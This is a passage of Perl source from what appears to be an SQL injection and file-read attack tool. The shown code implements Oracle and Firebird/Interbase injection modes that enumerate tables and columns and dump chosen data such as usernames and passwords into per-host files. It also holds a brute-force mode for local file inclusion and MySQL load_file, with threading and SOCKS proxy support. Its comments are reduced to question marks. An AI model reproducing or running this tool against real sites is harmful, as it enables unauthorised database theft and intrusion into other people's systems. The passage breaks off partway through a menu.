7576.      print FILE  "-----------------------------------------\n";
7577.      print FILE  "HOST: $host\n";
7578.      print FILE "-----------------------------------------\n";
7579.      print FILE "System information:\n";
7580.      print FILE "-----------------------------------------\n";
7581.      print "Request method - $method\n";
7582.      print "Threads - $kol_threads\n";
7583.      print "Proxy - $proxy_message\n";
7584.      print "----------------------\n";
7585.      for(0..$thr) {
7586.         $trl[$_] = threads->create(\&gets741);
7587.      }
7588.      for(0..$thr) {
7589.         $trl[$_]->join;
7590.      }
7591.      sub gets741 {
7592.         $| = 1;
7593.         while ($num<$size) {
7594.             { lock($num);
7595.             $num++; }
7596.             $current = $array[$num];
7597.             if ($num == 0) {$mess = 'version: '}
7598.             if ($num == 1) {$mess = "user: "}
7599.             $content = scan_url();
7600.             if ($content =~ m/ussr(.*?)ussr/imgs) {
7601.                   print $mess . $1 . "\n";
7602.                   print FILE $mess . $1 . "\n";
7603.             }
7604.             print $num . "\r";
7605.             sleep $pause;
7606.         }
7607.      }
7608.      print "----------\n";
7609.      print "Saved in " . "z_" . $host . ".txt\n";
7610.      close(FILE);
7611.      goto START_o;
7612. }
7613. if ($choice == 2) {
7614.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
7615.      $current = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(count(*))" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . 'sys.user_tables' . $o_filtr;
7616.      #print FILE $current . "\n";
7617.      $content = scan_url();
7618.      $tab_num = $content;
7619.      $tab_num =~ m/ussr(.*?)ussr/img;
7620.      $tab_num = $1; # ???-?? ???????? ? informaion_schema
7621.      print "-----------------------------------------\n";
7622.      print "Tables in sys.user_tables - $1\n";
7623.      print "-----------------------------------------\n";
7624.      ## start from2 ##
7625.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
7626.      $choice = <STDIN>;
7627.      chomp $choice;
7628.      $thr = $kol_threads; # ???-?? ???????
7629.      if ($choice == 1) {
7630.           $num = 0; # ?? ????????
7631.      } else {
7632.           print "Enter START_position: ";
7633.           $choice1 = <STDIN>;
7634.           chomp $choice1;
7635.           $num = $choice1-1;
7636.           print "Enter END_position: ";
7637.           $choice2 = <STDIN>;
7638.           chomp $choice2;
7639.           $tab_num = $choice2;
7640.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num) . "]\n";
7641.      }
7642.      print "-----------------------------------------\n";
7643.      ## end from2
7644.      print FILE  "-----------------------------------------\n";
7645.      print FILE  "Tables in sys.user_tables - $1\n";
7646.      print FILE  "-----------------------------------------\n";
7647.      $url12 = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(T.TN)" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . "(SELECT". $o_plus ."ROWNUM". $o_plus ."R,TABLE_NAME". $o_plus ."TN". $o_plus ."FROM". $o_plus ."sys.user_tables)". $o_plus ."T". $o_plus ."WHERE";
7648.      print "Request method - $method\n";
7649.      print "Threads - $kol_threads\n";
7650.      print "Proxy - $proxy_message\n";
7651.      print "----------------------\n";
7652.      for(0..$thr) {
7653.          $trl[$_] = threads->create(\&gets742);
7654.      }
7655.      for(0..$thr) {
7656.          $trl[$_]->join;
7657.      }
7658.      sub gets742 {
7659.        $| = 1;
7660.        while ($num<$tab_num) {
7661.          { lock($num);
7662.          $num++; }
7663.          $current = $url12 . $o_plus . "R=" . $num . $o_filtr;
7664.          $content = scan_url();
7665.          if ($content =~ m/ussr(.*?)ussr/imgs) {
7666.                   print $1 . "\n";
7667.                   print FILE $1 . "\n";
7668.          }
7669.          print $num . "\r";
7670.          sleep $pause;
7671.  
7672.        }
7673.      }
7674.     print "----------\n";
7675.     print "Saved in " . "z_" . $host . ".txt\n";
7676.     close(FILE);
7677.     goto START_o;
7678. }
7679. if ($choice == 3) {
7680.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
7681.     print "-----------------------------------------\n";
7682.     print "Enter the table_name: ";
7683.     $choice = <STDIN>;
7684.     chomp $choice;
7685.     print "Table: $choice\n";
7686.     print "----------\n";
7687.     print FILE  "-----------------------------------------\n";
7688.     print FILE  "Table [ $choice ]\n";
7689.     print FILE  "-----------------------------------------\n";
7690.     $table_name1 = $choice;
7691.     $table_name = char_p ($choice);
7692.     $current = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(count(*))" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . "sys.user_tab_columns" . $o_plus . "WHERE" . $o_plus . "TABLE_NAME=" . $table_name . $o_filtr;
7693.     $content = scan_url();
7694.     $content =~ m/ussr(.*?)ussr/img;
7695.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
7696.     print "Number of columns in " . $table_name1 . ": $colum_number\n";
7697.     print FILE  "Number of columns in " . $table_name1 . ": $colum_number\n";
7698.     print "----------\n";
7699.     ## ?????? ??????? ##
7700.     $thr = $kol_threads; # ???-?? ???????
7701.     $num = 0; # ????? ???????????
7702.     print "Request method - $method\n";
7703.     print "Threads - $kol_threads\n";
7704.     print "Proxy - $proxy_message\n";
7705.     print "----------------------\n";
7706.     $url12 = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(T.TN)" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . "(SELECT". $o_plus ."ROWNUM". $o_plus ."R,COLUMN_NAME". $o_plus ."TN". $o_plus ."FROM". $o_plus ."sys.user_tab_columns". $o_plus ."WHERE". $o_plus ."TABLE_NAME=" . $table_name . ")". $o_plus ."T". $o_plus ."WHERE";
7707.     print FILE  "Columns in " . $table_name1 . "\n";
7708.     for(0..$thr) {
7709.          $trl[$_] = threads->create(\&gets743);
7710.     }
7711.     for(0..$thr) {
7712.          $trl[$_]->join;
7713.     }
7714.     sub gets743 {
7715.        $| = 1;
7716.        while ($num<$colum_number) {
7717.          { lock($num);
7718.          $num++; }
7719.          $current = $url12 . $o_plus . "R=" . $num . $o_filtr;
7720.          $content = scan_url();
7721.          if ($content =~ m/ussr(.*?)ussr/imgs) {
7722.                   print "   " . $1 . "\n";
7723.                   print FILE "  "  . $1 . "\n";
7724.          }
7725.          print $num . "\r";
7726.          sleep $pause;
7727.  
7728.        }
7729.     }
7730.     print FILE "----------\n";
7731.     print "----------\n";
7732.     print "Saved in " . "z_" . $host . ".txt\n";
7733.     close(FILE);
7734.     goto START_o;
7735. }
7736. if ($choice == 4) {
7737.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
7738.     print "-----------------------------------------\n";
7739.     print "Enter the table_name: ";
7740.     $choice = <STDIN>;
7741.     chomp $choice;
7742.     $table_name = $choice;
7743.     $table_name1 = char_p ($choice);
7744.     print "Table: $table_name\n";
7745.     print "-----------------------------------------\n";
7746.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
7747.     $choice = <STDIN>;
7748.     chomp $choice;
7749.     $column_name1 = $choice;
7750.     $column_name = $choice;
7751.     @column_spis = split(/,/,$column_name);
7752.     $size = @column_spis;
7753.     if ($size > 1) {
7754.        $column_name = "";
7755.        $a = 0;
7756.        while ($a < $size) {
7757.         if ($a == ($size-1)) {
7758.           $column_name .= $column_spis[$a];
7759.         } else {
7760.           $column_name .= $column_spis[$a] . "||chr(58)||";
7761.         }
7762.           $a++;
7763.        }
7764.     }
7765.     print FILE  "-----------------------------------------\n";
7766.     print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " .$table_name . " ]\n";
7767.     print FILE  "-----------------------------------------\n";
7768.     print "Dump column(s): [ " . $column_name1. " ] from [ " .$table_name . " ]\n";
7769.     print "-----------------------------------------\n";
7770.     ## ?????? ???-?? ???????? ?? ??????? #
7771.     print "Count data from [ $table_name  ]\n";
7772.     $current = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(count(*))" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . $table_name . $o_filtr;
7773.     $content = scan_url();
7774.     $column_name_p = $content;
7775.     $column_name_p =~ m/ussr(.*?)ussr/img;
7776.     $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
7777.     print "$column_name_p\n";
7778.     print "----------\n";
7779.     print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
7780.     $choice = <STDIN>;
7781.     chomp $choice;
7782.     $thr = $kol_threads; # ???-?? ???????
7783.     if ($choice == 1) {
7784.          $num = 1; # ?? ????????
7785.     } else {
7786.          print "Enter START_position: ";
7787.          $choice1 = <STDIN>;
7788.          chomp $choice1;
7789.          $num = $choice1-1;
7790.          print "Enter END_position: ";
7791.          $choice2 = <STDIN>;
7792.          chomp $choice2;
7793.          $column_name_p = $choice2;
7794.          print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p) . "]\n";
7795.     }
7796.     print "-----------------------------------------\n";
7797.     print "Request method - $method\n";
7798.     print "Threads - $kol_threads\n";
7799.     print "Proxy - $proxy_message\n";
7800.     print "----------------------\n";
7801.     ## ?????? ?????? ?? ??????? ##
7802.     $url17 = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(T.TN)" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . "(SELECT". $o_plus ."ROWNUM". $o_plus ."R," . $column_name . $o_plus ."TN". $o_plus ."FROM". $o_plus . $table_name . ")". $o_plus ."T". $o_plus ."WHERE";
7803.     for(0..$thr) {
7804.         $trl[$_] = threads->create(\&gets744);
7805.     }
7806.     for(0..$thr) {
7807.         $trl[$_]->join;
7808.     }
7809.     sub gets744 {
7810.             $| = 1;
7811.             while ($num<$column_name_p) {
7812.                { lock($num);
7813.                $num++; }
7814.                $current = $url17 . $o_plus . "R=" . $num . $o_filtr;
7815.                $content = scan_url();
7816.                if ($content =~ m/ussr(.*?)ussr/img) {
7817.                     print "   " . $1 . "\n";
7818.                     print FILE "  "  . $1 . "\n";
7819.                }
7820.                print $num . "\r";
7821.                sleep $pause;
7822.  
7823.             }
7824.     }
7825.     print "----------\n";
7826.     print "Saved in " . "z_" . $host . ".txt\n";
7827.     close(FILE);
7828.     goto START_o;
7829. }
7830. if ($choice == 5) {goto START_global}
7831. }
7832. ####################################################################################################################
7833. ## Firebird/Interbase inj ##
7834. if ($choice == 7) {
7835. START_fi:
7836. if ($fi_source_sql =~ m/^https:\/\/?([^\/]+)/i) {
7837.    $host12 = $1;
7838.    $https_flag = 1;
7839.    print "----------------------\n";
7840.    print "HTTPS mode enabled\n";
7841.    print "----------------------\n";
7842. }
7843. $host = $host12;
7844. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
7845.     print "-----------------------------------------\n";
7846.     print "Authorization required, wait please....";
7847.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
7848.     $ck1 = collect($answ1);
7849.     $https_auth_check = 1;
7850.     print " DONE\n";
7851.     print "-----------------------------------------\n";
7852. }
7853. if ($use_socks == 1 && $socks_check == 0) {
7854.   $check_url = $host;
7855.   our $query = "GET / HTTP/1.$http_protocol\r\n"
7856.            . "Host: $check_host\r\n"
7857.            . "Referer: http://" . $check_url . "\r\n"
7858.            . "Accept: */*\r\n"
7859.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
7860.            . "Connection: close\r\n\r\n";
7861.    print "----------------------------------------\n";
7862.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
7863.    print "Timeout = 5 sec:\n";
7864.    print "----------------------------------------\n";
7865.    $socks_check = 0;
7866.    $check_socks = socks_check();
7867.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
7868.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
7869.   if ($current_proxy_host) {
7870.      $socks_check = 1;
7871.      print "Will use --> $proxy_message\n";
7872.   } else {
7873.      $socks_check = 0;
7874.      $proxy_message = "No";
7875.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
7876.   }
7877. }
7878. sub char_fi($) {
7879.          $str1=$_[0];
7880.          $aa="";$bb="";
7881.          for ($i = 0; $i<length($str1); $i++ ) {
7882.              $aa =  ord(substr($str1,$i,1));
7883.              if ( $i == 0 ) {$bb= "ascii_char(" . $aa . ")";} else { $bb= $bb. "||ascii_char(" . $aa . ")" ;}
7884.          }
7885.          return "$bb";
7886. }
7887. print "----------------------------------------------------------\n";
7888. print "               Choose mode:\n";
7889. print "----------------------------------------------------------\n";
7890. print "    [1] Firebird/Interbase SQL inj system information\n";
7891. print '    [2] Firebird/Interbase SQL inj get tables from rdb$relations (non system)' . "\n";
7892. print "    [3] Firebird/Interbase SQL inj get column_name from table\n";
7893. print "    [4] Firebird/Interbase SQL inj get data from columns\n";
7894. print "    =======================================================\n";
7895. print "    [5] Main menu\n";
7896. print "----------------------------------------------------------\n";
7897. $choice = <STDIN>;
7898. chomp $choice;
7899. print "Your choice: $choice\n";
7900. if ($choice == 1) {
7901.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
7902.      $url1 = $fi_source_sql . "cast(" . $fi_sql_pref1 . "user" . $fi_sql_pref2 . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
7903.      @array = ($url1);
7904.      $size = @array; #???????? ?????? ???????
7905.      $thr = $kol_threads; # ???-?? ???????
7906.      $num = -1; # ?? ????????
7907.      print "-----------------------------------------\n";
7908.      print "System information:\n";
7909.      print "-----------------------------------------\n";
7910.      print FILE  "-----------------------------------------\n";
7911.      print FILE  "HOST: $host\n";
7912.      print FILE "-----------------------------------------\n";
7913.      print FILE "System information:\n";
7914.      print FILE "-----------------------------------------\n";
7915.      print "Request method - $method\n";
7916.      print "Threads - $kol_threads\n";
7917.      print "Proxy - $proxy_message\n";
7918.      print "----------------------\n";
7919.      for(0..$thr) {
7920.         $trl[$_] = threads->create(\&gets6011);
7921.      }
7922.      for(0..$thr) {
7923.         $trl[$_]->join;
7924.      }
7925.      sub gets6011 {
7926.         $| = 1;
7927.         while ($num<$size) {
7928.             { lock($num);
7929.             $num++; }
7930.             $current = $array[$num];
7931.             if ($num == 0) {$mess = 'user: '}
7932.             $content = scan_url();
7933.             if ($content =~ m/ussr(.*?)ussr/imgs) {
7934.                   print $mess . $1 . "\n";
7935.                   print FILE $mess . $1 . "\n";
7936.             }
7937.             print $num . "\r";
7938.             sleep $pause;
7939.         }
7940.      }
7941.      print "----------\n";
7942.      print "Saved in " . "z_" . $host . ".txt\n";
7943.      close(FILE);
7944.      goto START_fi;
7945. }
7946. if ($choice == 2) {
7947.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
7948.      $current = $fi_source_sql . "cast((select" . $fi_plus . $fi_sql_pref1 . 'count(rdb$relation_name)' . $fi_sql_pref2 . $fi_plus . 'from' . $fi_plus . 'rdb$relations' . $fi_plus . 'where' . $fi_plus . 'rdb$system_flag=0)' . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
7949.      $content = scan_url();
7950.      $tab_num = $content;
7951.      $tab_num =~ m/ussr(.*?)ussr/img;
7952.      $tab_num = $1; # ???-?? ???????? ? informaion_schema
7953.      print "-----------------------------------------\n";
7954.      print 'Tables in rdb$relation (non system) - ' . $1 . "\n";
7955.      print "-----------------------------------------\n";
7956.      ## start from2 ##
7957.      print 'Get ALL tables from rdb$relation ('. $1 .') ? (1/0): ';
7958.      $choice = <STDIN>;
7959.      chomp $choice;
7960.      $thr = $kol_threads; # ???-?? ???????
7961.      if ($choice == 1) {
7962.           $num = -1; # ?? ????????
7963.      } else {
7964.           print "Enter START_position: ";
7965.           $choice1 = <STDIN>;
7966.           chomp $choice1;
7967.           $num = $choice1-1;
7968.           print "Enter END_position: ";
7969.           $choice2 = <STDIN>;
7970.           chomp $choice2;
7971.           $tab_num = $choice2;
7972.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num) . "]\n";
7973.      }
7974.      print "-----------------------------------------\n";
7975.      ## end from2
7976.      print FILE  "-----------------------------------------\n";
7977.      print FILE  'Tables in rdb$relation - '. $1 . "\n";
7978.      print FILE  "-----------------------------------------\n";
7979.      print "Request method - $method\n";
7980.      print "Threads - $kol_threads\n";
7981.      print "Proxy - $proxy_message\n";
7982.      print "----------------------\n";
7983.      for(0..$thr) {
7984.          $trl[$_] = threads->create(\&gets6012);
7985.      }
7986.      for(0..$thr) {
7987.          $trl[$_]->join;
7988.      }
7989.      sub gets6012 {
7990.        $| = 1;
7991.        while ($num<$tab_num) {
7992.          { lock($num);
7993.          $num++; }
7994.          $current = $fi_source_sql . "cast((select" . $fi_plus . 'first' . $fi_plus . '1' . $fi_plus . 'skip' . $fi_plus . $num . $fi_plus . 'distinct' . $fi_plus . $fi_sql_pref1 . 'rdb$relation_name' . $fi_sql_pref2 . $fi_plus . 'from' . $fi_plus . 'rdb$relations' . $fi_plus . 'where' . $fi_plus . 'rdb$system_flag=0)' . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
7995.          $content = scan_url();
7996.          if ($content =~ m/ussr(.*?)ussr/imgs) {
7997.                   print $1 . "\n";
7998.                   print FILE $1 . "\n";
7999.          }
8000.          print $num . "\r";
8001.          sleep $pause;
8002.  
8003.        }
8004.      }
8005.     print "----------\n";
8006.     print "Saved in " . "z_" . $host . ".txt\n";
8007.     close(FILE);
8008.     goto START_fi;
8009. }
8010. if ($choice == 3) {
8011.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
8012.     print "-----------------------------------------\n";
8013.     print "Enter the table_name: ";
8014.     $choice = <STDIN>;
8015.     chomp $choice;
8016.     print "Table: $choice\n";
8017.     print "----------\n";
8018.     print FILE  "-----------------------------------------\n";
8019.     print FILE  "Table [ $choice ]\n";
8020.     print FILE  "-----------------------------------------\n";
8021.     $table_name1 = $choice;
8022.     $table_name = char_fi ($choice);
8023.     $current = $fi_source_sql . "cast((select" . $fi_plus . $fi_sql_pref1 . 'count(rdb$field_name)' . $fi_sql_pref2 . $fi_plus . 'from' . $fi_plus . 'rdb$relation_fields' . $fi_plus . 'where' . $fi_plus . 'rdb$system_flag=0' . $fi_plus . 'and' . $fi_plus . 'rdb$relation_name=' . $table_name . ")" . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
8024.     $content = scan_url();
8025.     $content =~ m/ussr(.*?)ussr/img;
8026.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
8027.     print "Number of columns in " . $table_name1 . ": $colum_number\n";
8028.     print FILE  "Number of columns in " . $table_name1 . ": $colum_number\n";
8029.     print "----------\n";
8030.     ## ?????? ??????? ##
8031.     $thr = $kol_threads; # ???-?? ???????
8032.     $num = -1; # ?? ????????
8033.     print "Request method - $method\n";
8034.     print "Threads - $kol_threads\n";
8035.     print "Proxy - $proxy_message\n";
8036.     print "----------------------\n";
8037.     print FILE  "Columns in " . $table_name1 . "\n";
8038.     for(0..$thr) {
8039.          $trl[$_] = threads->create(\&gets6013);
8040.     }
8041.     for(0..$thr) {
8042.          $trl[$_]->join;
8043.     }
8044.     sub gets6013 {
8045.        $| = 1;
8046.        while ($num<$colum_number) {
8047.          { lock($num);
8048.          $num++; }
8049.          $current = $fi_source_sql . "cast((select" . $fi_plus . 'first' . $fi_plus . '1' . $fi_plus . 'skip' . $fi_plus . $num . $fi_plus . 'distinct' . $fi_plus . $fi_sql_pref1 . 'rdb$field_name' . $fi_sql_pref2 . $fi_plus . 'from' . $fi_plus . 'rdb$relation_fields' . $fi_plus . 'where' . $fi_plus . 'rdb$system_flag=0' . $fi_plus . 'and' . $fi_plus . 'rdb$relation_name=' . $table_name . ")" . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
8050.          $content = scan_url();
8051.          if ($content =~ m/ussr(.*?)ussr/imgs) {
8052.                   print "    " . $1 . "\n";
8053.                   print FILE "    " . $1 . "\n";
8054.          }
8055.          print $num . "\r";
8056.          sleep $pause;
8057.  
8058.        }
8059.     }
8060.     print FILE "----------\n";
8061.     print "----------\n";
8062.     print "Saved in " . "z_" . $host . ".txt\n";
8063.     close(FILE);
8064.     goto START_fi;
8065. }
8066. if ($choice == 4) {
8067.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
8068.     print "-----------------------------------------\n";
8069.     print "Enter the table_name: ";
8070.     $choice = <STDIN>;
8071.     chomp $choice;
8072.     $table_name = $choice;
8073.     $table_name1 = char_fi ($choice);
8074.     print "Table: $table_name\n";
8075.     print "-----------------------------------------\n";
8076.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
8077.     $choice = <STDIN>;
8078.     chomp $choice;
8079.     $column_name1 = $choice;
8080.     $column_name = $choice;
8081.     @column_spis = split(/,/,$column_name);
8082.     $size = @column_spis;
8083.     if ($size > 1) {
8084.        $column_name = "";
8085.        $a = 0;
8086.        while ($a < $size) {
8087.         if ($a == ($size-1)) {
8088.           $column_name .= $column_spis[$a];
8089.         } else {
8090.           $column_name .= $column_spis[$a] . "||ascii_char(58)||";
8091.         }
8092.           $a++;
8093.        }
8094.     }
8095.     print FILE  "-----------------------------------------\n";
8096.     print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " .$table_name . " ]\n";
8097.     print FILE  "-----------------------------------------\n";
8098.     print "Dump column(s): [ " . $column_name1. " ] from [ " .$table_name . " ]\n";
8099.     print "-----------------------------------------\n";
8100.     ## ?????? ???-?? ???????? ?? ??????? #
8101.     print "Count data from [ $table_name  ]\n";
8102.     $current = $fi_source_sql . "cast((select" . $fi_plus . $fi_sql_pref1 . 'count(*)' . $fi_sql_pref2 . $fi_plus . 'from' . $fi_plus . $table_name . ")" . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
8103.     $content = scan_url();
8104.     $column_name_p = $content;
8105.     $column_name_p =~ m/ussr(.*?)ussr/img;
8106.     $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
8107.     print "$column_name_p\n";
8108.     print "----------\n";
8109.     print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
8110.     $choice = <STDIN>;
8111.     chomp $choice;
8112.     $thr = $kol_threads; # ???-?? ???????
8113.     if ($choice == 1) {
8114.          $num = -1; # ?? ????????
8115.     } else {
8116.          print "Enter START_position: ";
8117.          $choice1 = <STDIN>;
8118.          chomp $choice1;
8119.          $num = $choice1-1;
8120.          print "Enter END_position: ";
8121.          $choice2 = <STDIN>;
8122.          chomp $choice2;
8123.          $column_name_p = $choice2;
8124.          print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p) . "]\n";
8125.     }
8126.     print "-----------------------------------------\n";
8127.     print "Request method - $method\n";
8128.     print "Threads - $kol_threads\n";
8129.     print "Proxy - $proxy_message\n";
8130.     print "----------------------\n";
8131.     ## ?????? ?????? ?? ??????? ##
8132.     for(0..$thr) {
8133.         $trl[$_] = threads->create(\&gets6014);
8134.     }
8135.     for(0..$thr) {
8136.         $trl[$_]->join;
8137.     }
8138.     sub gets6014 {
8139.             $| = 1;
8140.             while ($num<$column_name_p) {
8141.                { lock($num);
8142.                $num++; }
8143.                $current = $fi_source_sql . "cast((select" . $fi_plus . 'first' . $fi_plus . '1' . $fi_plus . 'skip' . $fi_plus . $num . $fi_plus . 'distinct' . $fi_plus . 'cast(' . $fi_plus . $fi_sql_pref1 . $column_name . $fi_sql_pref2 . $fi_plus . 'as' . $fi_plus . 'char(30000))' . $fi_plus . 'from' . $fi_plus . $table_name . ")" . $fi_plus . "as" . $fi_plus . $fi_convert . ")" . $fi_filtr;
8144.                $content = scan_url();
8145.                if ($content =~ m/ussr(.*?)ussr/img) {
8146.                     print "   " . $1 . "\n";
8147.                     print FILE "  "  . $1 . "\n";
8148.                }
8149.                print $num . "\r";
8150.                sleep $pause;
8151.  
8152.             }
8153.     }
8154.     print "----------\n";
8155.     print "Saved in " . "z_" . $host . ".txt\n";
8156.     close(FILE);
8157.     goto START_fi;
8158. }
8159. if ($choice == 5) {goto START_global}
8160. }
8161. ###################################################################################################################
8162. ## LFI/Reader/Load_file() bruter mode ##
8163. if ($choice == 8) {
8164. if ($lrl_url =~ m/^https:\/\/?([^\/]+)/i) {
8165.    $host2 = $1;
8166.    $https_flag = 1;
8167.    print "----------------------\n";
8168.    print "HTTPS mode enabled\n";
8169.    print "----------------------\n";
8170. }
8171. $host = $host2;
8172. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
8173.     print "-----------------------------------------\n";
8174.     print "Authorization required, wait please....";
8175.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
8176.     $ck1 = collect($answ1);
8177.     $https_auth_check = 1;
8178.     print " DONE\n";
8179.     print "-----------------------------------------\n";
8180. }
8181.     if ($use_socks == 1 && $socks_check == 0) {
8182.   $check_url = $host;
8183.   our $query = "GET / HTTP/1.$http_protocol\r\n"
8184.            . "Host: $check_host\r\n"
8185.            . "Referer: http://" . $check_url . "\r\n"
8186.            . "Accept: */*\r\n"
8187.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
8188.            . "Connection: close\r\n\r\n";
8189.    print "----------------------------------------\n";
8190.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
8191.    print "Timeout = 5 sec:\n";
8192.    print "----------------------------------------\n";
8193.    $socks_check = 0;
8194.    $check_socks = socks_check();
8195.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
8196.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
8197.   if ($current_proxy_host) {
8198.      $socks_check = 1;
8199.      print "Will use --> $proxy_message\n";
8200.   } else {
8201.      $socks_check = 0;
8202.      $proxy_message = "No";
8203.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
8204.   }
8205. }
8206.     sub ascii_to_hex ($) {
8207.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
8208.                $str = "0x" . $str;
8209.              return $str;
8210.     }
8211.     use LWP::Simple;
8212.     open(FILE, "<", $lrl_list);
8213.     while(<FILE>) {
8214.         chomp;
8215.         push(@lrl_error, $_);
8216.     }
8217.     close(FILE);
8218.     $size = 0;
8219.     $size = @lrl_error;
8220.     $size = $size -1;
8221.     START3:
8222.     print "----------------------------------------------------------------------------\n";
8223.     print "                 LFI/Reader/Load_file() bruter mode\n";
8224.     print "----------------------------------------------------------------------------\n";
8225.     print "    [1] LFI/Reader - visual error when wrong query\n";
8226.     print "    [2] LFI/Reader - unvisual error when wrong query\n";
8227.     print "    [3] Mysql load_file - visual error when wrong query, magic_quotes=OFF\n";
8228.     print "    [4] Mysql load_file - unvisual error when wrong query, magic_quotes=OFF\n";
8229.     print "    [5] Mysql load_file - visual error when wrong query, magic_quotes=ON\n";
8230.     print "    [6] Mysql load_file - unvisual error when wrong query, magic_quotes=ON\n";
8231.     print "    [7] Main menu\n";
8232.     print "----------------------------------\n";
8233.     $choice = <STDIN>;
8234.     chomp $choice;
8235.     if ($choice == 1 || $choice == 3){
8236.         print "scan URL: $lrl_url\n";
8237.         print "----------------------\n";
8238.         print "    [1] Start brute\n";
8239.         print "    [2] Main menu\n";
8240.         print "----------------------\n";
8241.         $choice1 = <STDIN>;
8242.         chomp $choice1;
8243.         if ($choice1 == 1) {
8244.             open( FILE1, ">>" . "z_" .$host2 . ".txt" ); # ???? ??? ?????? ???????????
8245.             open( FILE2, ">>" . "z_" .$host2 . "_CONTENT.txt" ); # ???? ??? ?????? ???????????
8246.             print FILE1 "-------------------------------------------------------\n";
8247.             print FILE1 "LFI/Reader/Load_file() - visual error when wrong query\n";
8248.             print FILE1 "-------------------------------------------------------\n";
8249.             print "File: $lrl_list\n";
8250.             print "Records: $size\n\n";
8251.             print "----------------------\n";
8252.             print "Request method - $method\n";
8253.             print "Threads - $kol_threads\n";
8254.             print "Proxy - $proxy_message\n";
8255.             print "----------------------\n";
8256.             $thr = $kol_threads; # ???-?? ???????
8257.             $num = -1; # ?? ????????
8258.             for(0..$thr) {
8259.                 $trl[$_] = threads->create(\&gets10);
8260.             }
8261.             for(0..$thr) {
8262.                 $trl[$_]->join;
8263.             }
8264.             sub gets10 {
8265.                $| = 1;
8266.                while ($num<$size) {
8267.                   { lock($num);
8268.                   $num++; }
8269.                   $current1 = $lrl_error[$num];
8270.                   $uri = $lrl_start . $current1 . $lrl_end;
8271.                   $current = $uri;
8272.                   $host = $host2;
8273.                   $content = scan_url();
8274.                   $lrl_flag = 1;
8275.                   if($content =~ m/$lrl_error_message/img || $content =~ m/Bad Request/img || $content =~ m/Parse error/img) {
8276.                       $lrl_flag = 0;
8277.                   }
8278.                   if ($lrl_flag == 1) {
8279.                        print "   ---> /" . $current1 . "\n";
8280.                        print FILE1 "     "  . $current . "\n";
8281.                        print FILE2 "\n\n\n====================================\n";
8282.                        print FILE2 "     /"  . $current1 . "\n";
8283.                        print FILE2 "====================================\n";
8284.                        print FILE2 $content . "\n";
8285.                   }
8286.                   print $num . "\r";
8287.                   sleep $pause;
8288.                }
8289.             }
8290.             print "-------------------------------------------------------------------------------\n";
8291.             print "Saved in " . "z_" . $host2 . ".txt and CONTENT in z_" . $host2 . "_CONTENT.txt\n";
8292.             close(FILE1);
8293.             close(FILE2);
8294.             goto START3;
8295.         }
8296.     }
8297.     if ($choice == 2 || $choice == 4){
8298.         print "scan URL: $lrl_url\n";
8299.         print "----------------------\n";
